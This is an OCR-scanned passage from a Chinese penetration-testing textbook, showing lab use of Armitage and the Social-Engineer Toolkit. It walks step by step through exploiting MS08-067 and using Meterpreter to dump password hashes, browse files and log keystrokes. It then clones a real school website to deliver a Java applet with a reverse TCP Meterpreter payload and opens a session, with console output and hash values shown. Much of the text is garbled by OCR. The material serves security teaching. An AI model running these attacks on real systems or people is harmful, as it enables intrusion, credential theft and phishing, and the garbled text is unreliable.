7 


192. 168. 169. 1 


| Login Li 
IRPA Li Services 
scan 
Host b 


dcerpc 
email 
http 
iis 
mssql 
novell 
oracle 


192. 168. 169. 133 


EE proxy 





00:50:56:FD:A4:A8 (VMware) 
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realserver 
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scada 
smb 

smtp 
wyse 








图 8-18 Zi HESEÉSR FL AttackZEXDi IJ JB 


RATIA ZS SEL ImsO8 06778idfE7J3e4, Brix H t smb, 
再 在 其 下 拉 荣 单 中 选中 ms08_067_netapi， 如 网 8-19 所 示 。 


ipass pipe exec 


msüs UG? netapl 


msl0 O61 spoolss 
netidentity xtierrpcpipe 


timbuktu plughntcommand bof 
pass the hash... 


check exploits... 





smb 
smtp 
Wyse 


c 0S details 


incorrect resu 


图 8-19” 找 天 ms08_067_netapi 选 项 


早 击 完成 之 后 ， 就 可 以 开始 攻击 了 了， 但 是 我 们 还 需要 设置 一 下 利用 
ms08_067 漏 洞 发 送 到 目标 上 的 Payload， 如 图 8-20 所 示 。 


Attack 192.168.169.132 o (0) £5 
MS08-067 Microsoft Server Service Relative Path Stack Corruption 
This module exploits a parsing flaw in the path canonicalization code of NetAPI32. dll 
: d r 


A 
through the Server Service. This module is capable of bypassing NX on some operating L 
svstems and service packs. The correct taraet must be used to prevent the Server 


Option 4 | Value 





LHOST 192.168.169.130 


LPORT ILI | 
RHOST + 192.168.169.132 
RPORT 





SMRPIPF RROWSFR 


Targets: |0 => Automatic Targeting D 
LJ Use a reverse connection 


LJ Show advanced options 


Launch 
图 8-20 设置 payload 


这 些 信 丈 认 信 吏 都 是 设置 好 的 ， 如 和 设 有 特殊 的 需要 ， 你 留 殉 认 信 
印 可 。 然 后 里 击 “Launch" 即 可 开始 攻击 。 被 成 功 渗 透 的 主机 如 图 8-21 所 
不 。 


192. 168. 169. 1 192. 168. 169. 132 192. 168. 169. 2 192. 168. 169. 133 
NT AUTHORITY\SYSTEM @ DH-CA8822AB9589 





图 8-21 WISEN 


攻击 成 功 之 后 ， 目 标 主 机 图 标 束 会 变 成 红色 边框 ， 并 且 内 电 环 统 ， 
而 且 下 方 会 显示 出 目标 主机 的 名 称 ， 这 样 的 主机 表示 被 我 们 成 功 地 渗透 
本。 


8.5 SEH Armitage RAEL maL 


KIWE- ESEN), d TER] A ~A Ff Meterpreterk fF 
务 。 在 目标 主机 上 单 击 鼠标 右键 ， 可 以 看 到 弹出 的 采 单 上 多 了 一 个 
Meterpreter 1 选项 ， 如 图 8-22 所 示 。 








图 8-22 ”Armitage 中 Meterpreter 提 供 的 功能 


利用 这 个 Meterpreter 我 们 可 以 完成 以 下 5 个 大 类 的 任务 ， 分 别 如 
下 。 


e Access， 这 个 大 类 中 的 任务 主要 是 跟 系 统 权 限 有 天 ， 例 如 合 看 系统 

哈 希 什 、 盗 取 令 牌 、 提 升 权 限 等 。 

Interact， 这 个 大 关 的 任务 是 打开 一 个 用 于 远程 控制 的 命令 ， 如 系统 

命令 行 、Meterpreter 命 令 等 。 

e Explore， 这 个 大 类 的 任务 主要 是 渗透 ， 例 如 浏 贤 系 统 文件 、 显 示 进 
程 、 监 视 键盘 、 堆 图、 控制 摄像 头等 。 

e Pivoting， 这 个 类 的 任务 主要 是 将 目标 主机 设置 成 为 跳板 。 

e ARP Scan， 利 用 目标 主机 对 目标 网 络 进行 扫 摘 。 


我 们 现在 驶 利 用 Meterpreter 来 完成 几 个 简单 的 任务 ， 例 如 盗 取 目 标 
主机 的 系统 密码 哈 希 。 首 先 单 击 Access， 然 后 在 弹出 染 单 中 选择 “Dump 


Hashes”， 这 里 一 共 提 供 了 3 种 方法 ， 选 择 第 一 种 “Isass method”， 如 图 8- 
23 上 所 示 。 


CT 


Attack » 
M Login "^ E 


ji Escalate Privileges Access > 
| steal Token Interact | 


Dump Hashes di sass method 


Persist : registry method 
Pass Session wdigest 


图 8-23 导出 目标 主机 系统 密码 的 哈 希 值 


险 布 密友 村 出 成 功 之 后 ， 束 会 在下 面 多 出 一 个 “Meterpreter 1 的 窗 
中 ， 在 这 个 窗口 中 会 显示 出 所 有 的 用 户 名 和 哈 希 密码 ， 例 如 在 图 8-24 中 
Sub Administrator Ml IJ Zz fd , 





Armitage View Hosts Attacks Workspaces Help 





» @ auxiliary 

> (8j exploit 4 
> @ payload 
> lj post 


192. 168. 169. 1 192. 168. 169. 132 192. 168. 169. 2 192. 168. 169. 133 
NT AUTHORITY\SYSTEM @ DH-CA8822AB9589 





à wv 








Console X | nmap X | exploit X | Scan X 


meterpreter> hashdump 





| Meterpreter 1 X | 
| Dumnina nassword hashes... 


Administrator :500:44efce164ab921caaad3b435b51404ee : 32ed87bdb5fdc5e9cba88547376818d4: : : 
Guest: 501: aad3b435b51404eeaad3b435b51404ee : 31dOcte0d16ae931b73c59d7e0c089c0:; : : 
HelpAssistant: 1000:32f842845a64f 17ccbe6b10315169b7e : 83789c0d8506a618d815fd9c6fb379e1: : : 


IUSR DH-CA88224B9589: 1003: de8b8cec054052bb8ab2d451a3e61856: 145f992fa5f f 125301520f8e27419c6d: : : 


IWAM DH-CA88224B9589: 1004: 90b05d38a1fc8d80a4ae31c7bc961352: 21950167d29421f 7c977fdfd1857b8a59: : : 


SUPPORT 388945a0: 1002:aad3b435b51404eeaad3b435b51404ee : bb5a5a239a6e521be591fdf091b05013: : : 


meterpreter > 


图 8-24 AA BT HE 8 4H. 


23 V HXÁL] S n] LEH Explore" d 2S2 56 HX E, PIA va 
目标 计算 机 上 的 文件 。 方 法 也 很 简单 ， 只 需要 依次 选择 Explore/ Browse 
Files 即 可 ， 如 图 8-25 所 示 。 


Attack » 


Login eE 
-a Log E 


Meterpreter L 


Browse Files Explor 


Show Processes | Loting 
Log Keystrokes ARP Scan... 
Screenshot kill 


| Webcam Shot 


sterpreterl X | Post Modules 
































图 8-25 iu 9d H ERE KI EE 


成 功 执行 这 个 命令 之 后 ， 我 们 可 以 看 见 下 面 多 了 一 个 “Files 1” 窗 
口 ， 这 个 窗口 束 是 目标 系统 上 的 资源 管理 喜 ， 框 选 部 分 是 一 个 地 址 栏 ， 
下 方 有 4 个 按钮 ， 分 别 是 上 传 、 创 建文 件 严 、 野 示 驱 动 盘 、 刷 新 4 个 功 
能 ， 如 图 8-26 所 示 。 


exploit X Meterpreter1 XJ Files1 X | 


篇 CWINDOWwS\system32 











D 4|Name | Size | Modified | Mode | 

| xmlprovi, dll 49kb 2008-04-14 08:00:00 -0400 100666/rw-rw-rw- A 
xolehlp. dll llkb 2008-04-14 08:00:00 -0400 100666/rw-rw-rw- 
xpob2res. dll 428kb 2008-04-14 08:00:00 -0400 100666/rw-rw-rw- 
xpspl1res. dll 183kb 2008-04-14 08:00:00 -0400 100666/rw-rw-rw- 
xpsp2res. dll 2mb 2008-04-14 08:00:00 -0400 100666/rw-rw-rw- 
xpsp3res. dll 673kb 2008-04-14 08:00:00 -0400 100666/rw-rw-rw- 
zipfldr. dll 330kb 2008-04-14 08:00:00 -0400 100666/rw-rw-rw- v 


Upload... Make Directory List Drives Refresh 
图 8-26 ”但 看 到 的 目标 主机 上 的 文件 
“log Keystokes” 是 一 个 十 分 有 意思 的 功能 ， 利 用 这 个 模块 可 以 偷偷 


记录 目标 用 户 吏 击 键盘 的 动作 ， 使 用 方法 为 依次 单 击 “Explore”/“Log 
Keystrokes”， 如 图 8-27 所 示 。 










em, 


JE P attack » 
e. E J Login » 
ETP 


Meterpreter 1 xi 







192. 168. 16' pen ud 
XSYSTEM à Interact b 
Browse Files Explore 到 
Show Processes | 上 Voting b 
ARF Scan... 

Screenshot Kill 

Webcam Shot 


rpreterl X [FI Post Modules 











图 8-27 ”键盘 监听 器 
这 时 束 会 司 动 一 个 键盘 监听 器 ， 保 持 默认 设置 即 可 ， 如 网 8-28 上 所 


Log Keystrokes o oso 
Windows Capture Keystroke Recorder 


This module can be used to capture keystrokes. To capture keystrokes when ^ 

the session is running as SYSTEM, the MIGRATE option must be enabled and s 

the CAPTURE_TYPE option should be set to one of Explorer, Winlogon, or a 
i i etia: r 


enanifin DIT T^ rantura tha kauntrakan nf tha intera co tha Cunlarar 


了 








^ (Kw — 












| Option 4 | Value | 

CAPTURE TYPE explorer 

INTERVAL 5 

LOCKSCREEN 0 

MIGRATE T 

PID 

SESSION + I 

ShowKeystrokes T 


LJ Show advanced options 


| Launch | 
图 8-28 ”键盘 监听 项 的 设置 


单 击 “Launch” 按 钮 局 动 这 个 键盘 监听 喜之 后 ， 在 下 方丈 会 多 出 一 
个 “Log Keystrokes” 黎 口 ， 这 个 寡 口 中 显示 了 将 监听 的 记录 保存 到 了 一 
个 记事 本 文件 中 ， 如 图 8-29 所 示 。 


> (lij auxiliary 
> (ll exploit 
> (8j payload 
> 入 post 


192.168.169.1 192. 168. 169. 132 192. 168. 169. 2 192. 168. 169. 133 
NT AUTHORITY\SYSTEM @ DH-CA8822AB9589 








Console X | nmap X | exploit X | Scan X | Meterpreter 1 X | Files 1 X§ Log Keystrokes ~] 


MIGRATE => true 
msf post( ) > set ShowKeystrokes true 
ShowKeystrokes => true 
msf post( ) > run -j 
[*] Post module running as background job 
[*] Executing module against DH-CA8822AB9589 
[*] Trying expLorer,exe (472) 
+] Successfully migrated to Explorer.EXE (472) as: DH-CA8822AB9589MAdministrator 
[*] Starting the keylog recorder... 





l Mowctrokoc hoinac cowond in to 


/root/.msf4/Loot/20171030000239 default 192， 168.169.132 host.windows.key 684936.txt 
| Recording keystrokes,.. 
mst post( ) > 


图 8-29 SERI HA HT aS UIS R 


我 们 在 目标 计算 机 上 打开 一 个 记事 本 程序 ， 随 便 输入 一 操 内 容 作 为 
调试 ， 如 图 8-30 所 示 。 





I. Untitled - Notepad 
File Edit Format wiew Help 
Today is a good day | 





图 8-30 ”在 目标 主机 打开 一 个 记事 本 程序 


然后 我 们 返回 到 Armitage 来 查看 一 下 监听 到 的 内 容 ， 如 图 8-31 所 
ZJN o 


[*] Post module running as background job 
| Executing module against DH-CA8822AB9589 
Trying explorer.exe (472) 
Successfully migrated to Explorer. EXE (472) as: DH-CA8822AB9589\Administrator 
| Starting the keylog recorder... 
| Keystrokes being saved in to 


/root/.msf4/loot/20171030000239_default_ 192. 168. 169. 132_host.windows .key_ 684936. txt 


Recording keystrokes... 
Kauctrakac canturad Tnadu Racks “Rack> <Back> day 


Keystrokes captured is a good day 


NS pu5tt 





图 8-31 监听 到 的 结果 


怎么 样 ，Armitage 的 操作 是 不 是 比 命令 行 式 的 Metasploit 简 单 多 了 ? 


8.6 ”小 结 


在 这 一 章 中 我 们 引入 了 Metasploit 的 图 形 化 操作 界面 一 一 Armitage， 
这 是 一 蒜 由 Java 开 发 的 工具 。 它 本 里 并 不 具备 渗透 功能 ， 但 是 可 以 远程 
操作 Metasploit， 从 而 完成 Metasploit 才 能 完成 的 任务 。 而 现在 我 更 建议 
倪 学 者 选择 使 用 Armitage， 因 为 对 于 刚 接 触 黑 客 技 术 的 人 来 说， 最 为 困 
难 的 无 非 束 是 那些 难 记 的 命令 了 ， 使 用 Armitage 则 可 以 绕 过 这 些 困难 ， 
从 而 将 更 多 的 精力 放 在 渗透 本 早 ， 而 不 是 工具 的 使 用 上 。 


在 本 章 开 始 的 时 候 ， 我 们 讲解 了 如 何 司 动 和 配置 Armitage。 接 看 讲 
到 了 Armitage 如 何 生成 远程 控制 工具 的 主 控 靖 和 梓 控 靖 。 在 Armitage 中 
还 集成 了 Nmap， 这 样 吏 可 以 将 扫描 和 渗透 两 个 操作 无 颖 地 结合 起 来 ， 
然后 我 们 按照 渗透 操作 的 顺序 ， 移 后 显示 如 何 对 目标 进行 扫 拉 和 渗透 ， 
以 及 在 成 功 渗透 之 后 进行 的 各 种 操作 。 这 个 工具 绝对 是 渗透 行业 新 手 的 
人 福音， 但 是 很 大 程度 上 要 依靠 目标 主机 上 的 漏 铜 ， 如 果 目 标 及 时 地 安 帮 
了 所 有 更 新 ， 成 功率 就 会 变 得 很 低 。 从 下 一 章 开 始 ， 我 们 将 会 介绍 一 种 
成 功率 更 高 的 攻击 方式 ， 这 也 和 是 目 前 最 为 热门 的 攻击 方式 。 





第 9 章 
社会 工程 学 工具 


大 多 数 人 心目 中 的 黑客 往往 是 这 样 一 种 形象 ， 他 们 不 修 边 幅 ， 挥 金 
如 土 ， 工 作 的 时 候 只 需要 一 台 联 上 互联 网 的 计算 机 。 如 果 愿 意 的 话 ， 他 
们 坐 在 家 里 就 可 以 把 美国 五 角 大 楼 给 黑 了 。 所 以 每 当 我 向 客户 提出 要 他 
们 建立 并 严格 执行 完善 的 网 络 安全 管理 制度 时 ， 他 们 总 是 很 惊 谨 的 
IBAA, AURREREN? BARDEA, EER 
实 是 一 “ 拦 得 住 ”， 


绝 大 多 数 的 黑客 入 侵 并 不 是 单纯 依 徘 技术 手段 实现 的 。 在 现实 中 ， 
往往 融 是 使 用 痢 的 一 氮 巩 急 导 致 了 网 络 中 的 所 有 防 逢 手段 形同虚设 。 
此 ， 人 是 网 络 安全 中 一 个 远 比 设备 和 程序 更 重要 的 因素 。 而 在 网 络 安全 
中 社会 工程 学 所 攻击 的 目标 束 是 人 人， 下面 我 们 先 来 围绕 以 下 几 扣 展开 对 
社会 工程 学 的 概念 及 一 些 第 见 手段 的 讲解 。 


社会 工程 学 的 概念 

Kali Linux 2 系统 中 的 社会 工程 学 工具 包 
SET 工具 包 中 的 网 页 攻击 方法 

在 SET 工 具 包 中 使 用 Metasploit 中 模块 
FP ACRI EIS] 1 HX 

标签 页 欺骗 方式 

页 IRE] ERA Ji 73 3X 

HTA XIE Ud SCR 7J 3N 

目 动 播放 文件 攻击 


9.1 社会 工程 学 的 概念 


社会 工程 学 是 一 种 通过 研究 受害 者 心理 ， 并 以 此 谤 使 受害 者 做 出 配 
合 ， 从 而 达到 目 映 目的 的 方法 。 其 实 我 一 了 十 沉 得 社会 工程 学 和 中 国 上 古代 
的 “和 干 术 ”十 分 类 似 ， 二 者 部 是 “欺骗 的 筷 术 。 历 史上 最 姓名 的 黑客 米 特 
尼克 在 他 的 作品 《 反 欺 骗 的 三 术 》 中 这 一 炊 提 到 社会 工程 学 ， 长 期 以 来 
在 网 络 安全 领域 中 ， 社 会 工程 学 指 的 束 古 一 种 退 过 对 受害 者 心理 弱 后 、 
本 能 反应 、 好 奇 心 、 信 任 、 贪 梦 等 心理 陷阱 进行 诸如 欺骗 等 危害 手段 取 
得 自身 利益 的 手法 。 近 年 来 ， 利 用 社会 工程 学 从 事 犯 罪 的 人 数 已 成 迅速 
上 升 的 趋势 ， 给 网 络 安全 造成 了 极 大 的 隐患 。 


在 Kali Linux 2 中 也 包 侣 了 一 区 目前 在 世界 上 极为 流行 的 工具 一 一 
SET。 利 用 这 些 工 具 ， 再 加 上 使 用 者 的 泗 撤 ， 钊 币 会 让 受害 者 在 不 知 不 
芭 中 束 控 入 到 陷阱 中 。 不 过 限于 “当地 法 律 和 法 规 的 限制 ">， 这 里 我 们 探 
WT AI YE EX R FSET LR OREHA YS 


SETXXZX LARA ZJSocial-Engineer Toolkit (社会 工程 学 工具 
包 ) ， 是 由 美国 著名 黑客 David Kennedy (ReLIK) 所 编写 。 需 要 注意 的 是 
这 并 不 只 是 一 蒜 单 独 的 工具， 而 是 第 用 的 社会 工程 学 工具 的 集合 ， 其 中 
包 食 了 许多 渗透 测试 工具 。 


自 和 完 我 们 在 Kali Linux 2 中 局 动 这 个 Social-Engineer Toolkit, XIT 
具 属 于 第 13 个 分 类 Social Engineering Tools 中 ， 如 图 9-1 所 示 。 





图 9-1 ”在 “Applications” 中 选中 SET 
IH SIISETZ Jk B SCAN Tr rn Ad ET9-2 T7 - 


Terminal 


File Edit View Search Terminal Help 


The SociaL-Engineer Toolkit is a product of TrustedSec . 





K9-2 ”启动 之 后 的 SET 版 本 


SET 是 一 个 这 单 驱动 的 工具 ， 局 动 之 后 的 SET 工作 界面 如 网 9-3 所 
示 。 我 们 只 需要 选择 对 应 的 序号 就 可 以 完成 指定 的 功能 。 


Terminal oo o 
File Edit View Search Terminal Help 


The Social-Engineer Toolkit is a product of TrustedSec . 


Visit: 


Select from the menu: 


1) Social-Engineering Attacks 
2) Penetration Testing (Fast-Track) 
3) Third Party Modules 
4) Update the Social-Engineer Toolkit 
5) Update SET configuration 
6) Help, Credits, and About 

) 


99) Exit the Social-Engineer Toolkit 





>l 


图 9-3 ”局 动 之 后 的 SET 工作 界面 
图 9-3 的 某 单 一 共有 7 个 选项 ， 分 别 古 : 


1) 社会 工程 学 攻击 。 


2) 渗透 测试 (Fast-Track) 。 

3) 第 三 方 模块 。 

4) 升级 软件 。 

5) 升级 配 首 。 

6) 帮助 。 

99) 退出 。 

我 们 按照 这 个 系统 提供 的 菜单 来 熟悉 一 下 SET 中 的 功能 ， 如 图 9-4 所 
人 


Terminal o o o 
File Edit View Search Terminal Help 


Select from the menu: 


1) Spear-Phishing Attack Vectors 


2) Website Attack Vectors 

) Infectious Media Generator 

) Create a Payload and Listener 

) Mass Mailer Attack 

) Arduino-Based Attack Vector 

) Wireless Access Point Attack Vector 
) QRCode Generator Attack Vector 

) Powershell Attack Vectors 

10) SMS Spoofing Attack Vector 

11) Third Party Modules 


99) Return back to the main menu. 


> 





图 9-4 ”SET 中 提供 的 功能 
SET 里 面 一 共 提 供 了 12 个 功能 ， 分 别 是 : 
1) 鱼 叉 式 网 络 钓鱼 攻击 癌 量 。 
2) 网 页 攻击 癌 量 。 
3) RRE E an e 


4) 创建 payload 和 listener。 

5) 海量 邮件 攻击 。 

6) 基于 Arduino 的 硬件 攻击 向 量 。 
7) 无 线 热点 攻击 同 量 。 

8) 二 维 码 攻击 向 量 。 

9) Powershell 攻 击 向 量 。 

100 短信 和 欺骗 攻击 问 量 。 

11) 第 三 方 模块 。 

99) 返回 到 上 一 


这 里 面 的 第 一 项 是 鱼 义 式 网 络 钓 鱼 攻 击 问 量 ， 主 要 的 思路 是 癌 目 标 
发 送 一 个 带 有 恶意 的 文件 作为 附件 的 邮件 ， 然 后 当 对 方 运行 这 个 附件 之 
后 ， 来 取得 目标 计算 机 的 控制 权 ， 如 图 9-5 所 示 。 


Terminal ooo0 
File Edit View Search Terminal Help 
2-1 


The Spearphishing module allows you to specially craft email messages and send 

them to a large (or small) number of people with attached fileformat E 

payloads. If you want to spoof your email address, be sure "Sendmail" 

stalled (apt-get install sendmail) and change the config/set config SENDMAIL- OF 


flag to SENDMAIL=ON . 


There are two options, one is getting your feet wet and letting SET do 


everything for you (option 1), the second is to create your own FileFormat 
payload and use it in your own attack. Either way, good luck and enjoy! 


1) Perform a Mass Email Attack 
2) Create a FileFormat Payload 
3) Create a Social-Engineering Template 


99) Return to Main Menu 


>f 


图 9-5  SET'HHSf& X Xv] 28 m h E 


但 是 SET 中 发 送 电子 邮件 使 用 的 邮箱 为 Gmail， SET 中 后 面 还 有 很 
大 一 部 分 在 介绍 如 何 生 成 恶意 文件 ， 我 们 只 需要 将 生成 的 恶意 文件 作为 
纵 件 即 可 以 完成 同样 的 工作 ， 所 以 这 部 分 不 做 详细 的 介绍 





9.3 SET LI. H.E, F I] oJ va Jti 71 14 


我 们 直接 来 得 看 一 下 SET 工具 包 中 的 第 二 部 分 网 页 攻击 癌 量 ， 这 
面包 含 了 一 些 很 有 音 思 有 的 网 页 攻击 方法 ， 如 图 9-6 所 示 。 


Terminal o oo0 
File Edit View Search Terminal Help 


1) Jav a Apple et Atta ck Method 
asplo t Bro r Ex ploit Method 


ial Ha r Atta ck Method 
ing Atta d Me d 


acking Attack Method 
2 tt “Atta ck Web Method 
7) Full Screen Attack Method 
8) B ms mul Method 


99) Return to Main Men 





图 9-6 ”SET 中 的 网 页 攻击 同 量 包含 的 方法 


自 完 ， 我 们 来 全 看 这 里 面 的 第 一 个 方法 ，“Java Applet Attack 
Method”， 如 图 9-7 所 示 。 从 名 字 上 整 可 以 看 出 来 ， 这 种 方法 古 与 Java 
Applet «HJ. Java Applet ze H Javai S 2,8 53 J^ INL HI REF, y ia 
ECBERIUNGBU P] Vi rn, FRR ERIR, Applet nin, 2s 
生 .class 的 文件 ,把 .class 的 文件 舱 在 html 的 网 页 中 ， 只 要 用 户 VES ed 
页 里 ，Applet 便 会 随 看 网 页 下 载 到 用 户 的 计算 机 运行 。 那 么 我 们 在 进行 
渗透 测试 的 时 候 ， 可 以 将 以 此 来 检测 目标 用 户 的 浏览 右 安 全 级 别 是 否 中 
以 抵御 这 种 钓鱼 攻击 。 


Terminal ooo 
File Edit View Search Terminal Help 
- >l 


The first method will allow SET to import a list of pre-defined web 
applications that it can utilize within the attack. 


The second method will completely clone a website of your choosing 
and allow you to utilize the attack vectors within the completely 
same web application you were attempting to clone. 


The third method allows you to import your own website, note that you 


should only have an index.html when using the import website 
functionality. 


1) Web Templates 
2) Site Cloner 
3) Custom Import 
99) Return to Webattack Menu 


E 





图 9-7 SET 中 的 “Java Applet Attack Method” 
这 里 因为 采用 网 站 攻击 的 方式 ， 所 以 必须 先 建立 一 个 网 站 出 来 ， 妆 
然 我 们 无 需 自 己 使 用 HTML 和 CSS 去 重新 编写 一 个 页 面 ， 不 然 SET 就 没 
有 意义 了 。SET 对 于 页 面 的 建立 一 共 提 供 了 如 下 3 种 方法 : 
1) Web Templates. 
2) Site Cloner. 


3) Custom Import. 


“Web Templates” 指 的 就 是 利用 SET 中 日 带 的 模板 作为 钓鱼 网 站 ， 
SET 中 选择 了 几 个 国外 比较 闭 名 的 网 站 ， 例 如 Yahoo、Gmail 等 。 


“Site Cloner” 是 SET 中 一 个 极为 强大 的 功能 ， 它 可 以 元 隆 任何 的 网 
站 ， 你 可 以 使 用 它 模 拟 出 想 要 冒 元 的 网 站 ， 例 如 条 个 单位 的 OA 之 类 

“Custom Import”* 这 里 允许 你 导入 目 己 设计 的 网 站 。 

这 里 我 们 选择 第 二 个 选项 ， 如 图 9-8 所 示 。 
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NAT/Port Forwarding c b 
not e 


9 
xternally expose 





pe 
> Are you using NAT/Port Forwarding [yes|no]: J 


图 9-8 SET 中 的 “Site Cloner” 功 能 


这 里 我 们 在 内 网 中 建立 一 个 网 站 ， 所 以 不 使 用 NAT 技 术 ， 这 里 选择 


nobl pj. 


HH Applet Wjava EF A AR EH AIRA, MAD A mE 
下 载 后 会 受到 安全 限制 ;在 这 里 需要 使 用 一 个 经 过 签名 的 Applet， 上 所 以 
我 们 使 用 系统 内 置 的 Applet， 如 图 9-9 所 示 。 


Terminal eoo0o0 
File Edit View Search Terminal Help 


Next we need to specify whether you will use your own self generated java app 
let, built in applet, or your own code signed java applet. In this section, y 
ou have all three options available. The first will create a self-signed cert 
ificate if you have the java jdk installed. The second option will use the on 
e built into SET, and the third will allow you to import your own java applet 


OR code sign the one built into SET if you have a certificate. 
Select which option you want: 
1. Make my own self-signed certificate applet. 

T: 


. Use the applet built into SE 
3. I have my own code signing certificate or applet. 





Enter the number you want to use [1-3]: Li 


图 9-9 ”为 Applet 选 择 签名 


此 时 ， 系 统 需 要 我 们 输入 要 克隆 网 站 有 的 地 址 ， 也 就 十 要 冒充 的 那个 
网 站 ， 如 图 9-10 所 示 。 这 里 《出 于 法 律 方面 的 问题 ， 我 不 使 用 其 他 网 
站 ) 我 将 元 隆 的 网 站 设置 为 我 所 在 单位 的 主页 ， 如 图 9-11 所 示 。 


Terminal o oo0 
File Edit View Search Terminal Help 
Okay! Using the one built into SET - be careful, self signed isn't accepti 
ed in newer versions of Java :( 
SET supports both HTTP and HTTPS 
Meath http:y/www.thisisafakesite.conm 
> Enter the url to ctLone : 国 


图 9-10 ”输入 要 克隆 网 站 的 地 址 


Terminal @ 日 日 





File Edit View Search Terminal Help 
= > Enter the url to clone:www.tstc.edu.cn 





图 9-11 ”开始 克隆 网 站 


图 9-11 中 的 第 4 行 “[*] Inject Java Applet attack into the newly cloned 
website” 提 示 我 们 可 以 在 新 克隆 好 的 网 站 上 开展 一 次 Java Applet 攻 击 。 
然后 a 攻击 载 何 的 方式 ， 这 里 面 我们 选择 
其 中 的 第 一 项 ，Meterpreter Mermory Injection (DEFAULT) ， 如 图 9-12 


HIZR e 
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What payload do you want to generate: 


Name: Description: 


1) Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter pa 
yload through PyInjector 

2) Meterpreter Multi-Memory Injection This will drop multiple Metaspl 
oit payloads via memory 

3) SE Toolkit Interactive Shell Custom interactive reverse tool 
kit designed for SET 

4) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with A 
ES encryption support 

5) RATTE HTTP Tunneling Payload Security bypass payload that wi 
ll tunnel all comms over HTTP 

6) ShellCodeExec Alphanum Shellcode This will drop a meterpreter pa 
yload through shellcodeexec 

7) Import your own executable Specify a path for your own exe 
cutable 





图 9-12 ”选择 要 使 用 的 payload 


然后 需要 设置 用 来 监听 的 病 口 ， 这 里 默认 是 443， 我 们 保持 不 变 ， 
征 接 单 击 回 后 键 即 可 ， 如 图 9-13 所 示 。 
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Select the payload you want to deliver via shellcode injection 


) Windows Meterpreter Reverse TCP 

) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager 
) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager 

) 


1 
2 
3 
4) Windows Meterpreter (ALL PORTS) Reverse TCP 





> Enter the number for the payload [meterpreter reverse https]: 


图 9-13 ”选择 payload 的 连接 方式 


这 里 我 们 选择 一 个 最 为 常用 的 第 1 种 ， 反 加 的 TCP Meterpreter， 如 
图 9-14 所 示 。 
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: » Enter the number for the payload [meterpreter reverse https]:1 
Prepping pyInjector for delivery.. 

Prepping website for pyInjector shellcode injection.. 

Base64 encoding shellcode and prepping for delivery.. 

Multi/Pyinjection was specified. 0verriding config options. 

Generating x86-based powershell injection code... 

Finished generating powershell injection bypass. 

Encoded to bypass execution restriction policy... 


The site has been moved. SET Web Server is now listening.. 
Launching MSF Listener... 
This may take a few to load MSF... 





图 9-14 ”启动 伪造 的 页 面 服务 器 


然后 这 里 的 SET 工具 包 还 十 分 人 性 化 地 帮 我 们 局 动 了 Metasploit， 并 
目 动 化 地 用 于 监听 恶意 程序 的 Handler 启 动 起 来 ， 如 图 9-15 所 示 。 
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p—— 


] 
1659 exploits - 950 auxiliary - 293 post ] 
486 payloads - 40 encoders - 9 nops ] 
Free Metasploit Pro trial: http://r-7.co/trymsp ] 


Processing /root/.set//meta_config for ERB directives. 
resource (/root/.set//meta_config)> use exploit/multi/handler 
resource (/root/.set//meta_config)> set PAYLOAD windows/meterpreter/reverse tc 


p 
PAYLOAD => windows/meterpreter/reverse tcp 
resource (/root/.set//meta config)» set LHOST 111.227.16.83 
LHOST => 111.227.16.83 
resource (/root/.set//meta_config)> set LPORT 443 
LPORT => 443 
resource (/root/.set//meta_config)> set EnableStageEncoding false 
EnableStageEncoding => false 
resource (/root/.set//meta config)> set ExitOnSession false 
ExitOnSession => false 
resource (/root/.set//meta config)» exploit -j 
Exploit running as background job. 


Handler failed to bind to 111.227.16.83:443:- 
Started reverse TCP handler on 0.0.0.0:443 
Starting the payload handler... 

sf exploit( ) > | 


图 9-15 ”局 动用 来 控制 Meterpreter 的 handler 


这 样 只 要 有 人 访问 了 我 们 伪造 的 网 站 并 下 载 执行 了 Applet 之 后 ， 
Metasploit 束 会 有 提示 。 现 在 我 们 从 另外 一 全 计算 机 来 访问 这 个 虚假 的 
网 址 ， 在 运行 这 个 网 站 之 后 ， 会 弹出 一 个 数字 签名 ， 如 果 用 户 单 击 “ 运 
行 "?， 束 会 被 控制 ， 如 图 9-16 所 示 。 
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图 9-16 ”伪造 的 网 站 


在 这 里 SET 展示 了 它 最 迷惑 人 的 地 方 ， 你 可 以 仔细 地 碍 看 现在 的 地 
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图 9-17 真实 的 网 站 


就 是 说 在 一 开始 的 时 候 ， 受 害 者 访问 的 是 虚假 的 网 站 ， 并 在 这 个 
ris 运行 了 一 个 Applet， 然 后 受害 者 的 浏览 器 就 跳 转 到 了 真 的 网 
Mp o 


WR 算 机 上 又 发 生 了 什么 呢 ， 我 们 回头 来 


系统 已 经 打开 了 一 个 Session， 如 图 9-18 所 示 。 这 里 我 们 就 可 以 按照 
之 前 前 面 章节 讲 过 的 那样 ， 使 用 Meterpreter 来 控制 目标 计算 机 了 了。 
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File Edit View Search Terminal Help 
LPORT => 443 
resource (/root/.set//meta config)» set EnableStageEncoding false 
EnableStageEncoding -» false 
resource (/root/.set//meta config)» set ExitOnSession false 
ExitOnSession => false 
resource (/root/.set//meta config)> exploit -j 
Exploit running as background job. 


Started reverse TCP handler on 192.168.169.130:443 

Starting the payload handler... 
msf exploit( )» 192.168.169.131 - = [09/Jul1/2017 04:47:08] "GET / HTTP/1.1" 2 
00 - 


192.168.169.131 - - [09/Jul/2017 04:47:09] "GET /PoisYTxxN.jar HTTP/1.1" 200 - 
19 
2.168.169.131 - - [09/Jul/2017 04:47:56] "GET /pfFsdsO HTTP/1.1" 200 - 
Sending st 
age (957487 bytes) to 192.168.169.131 
Meterpreter session 1 opened (192.168.169.130:443 -> 192.168.169.131:49251) at 2 





017-07-09 04:48:01 -0400 
L| 


图 9-18 通过 Applet 建 立 的 session 


接 下 来 我 们 来 看 看 这 里 面 提 供 的 第 二 个 “Metasploit Brower Exploit 
Method” 方 法 ， 如 图 9-19 所 示 。 


File Edit View Search Terminal Help 


1 
nk. You can edit the link replacement settings in the set confi 
/fast. 
The Multi-Attack method will add a combination of attacks through the web attack 
menu. For example you can utilize the Java Applet, Metasploit Browser, Credenti 

al Harvester/Tabnabbing all at once to see which is successful. 
The HTA Attack method will allow you to clone a site and perform powershell inje 
ction through HTA files which can be used for Windows-based powershell exploitat 
ion through the browser. 

Java Applet Attack Method 

Metasploit Browser Exploit Method 

3) Credential Harvester Attack Method 


d 
Web Jacking Attack Method 
Multi-Attack Web Method 


Full Screen Attack Method 
HTA Attack Method 


